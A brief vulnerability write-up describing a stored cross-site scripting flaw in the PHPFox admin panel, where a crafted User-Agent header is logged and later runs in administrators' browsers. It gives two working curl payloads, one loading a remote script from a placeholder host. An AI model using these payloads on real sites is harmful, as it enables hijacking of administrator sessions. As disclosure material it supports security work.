PHPFox XSS ADMINCP
[+] Links
[+] CVE’s
[+] Description
The system stores all urls accessed in a database table, below information in the same ‘phpfox_log_session’
[phpfox]
> desc phpfox_log_session;
the column that can be manipulated is:
-> user_agent (100)
all acess store in the system, such as bots and users wandering around the web site, can be seen in:
AdminCP
TOOLS > Online > Guests/Boots
Output
| IP ADDRESS | User-Agent | …
knowing this, the following code was created to inject a script into the AdminCP with User-Agent.
$ curl -A "< script src='http://www.example.com/script.js'>< / script >" \ http://www.meusite.com.br/
OR
$ curl -A "< script>alert(1); < / script >" \ http://www.meusite.com.br/
when any user with administrative access in.
‘AdminCP’
TOOLS > Online > Guests/Boots
we have the script running in the administrative area.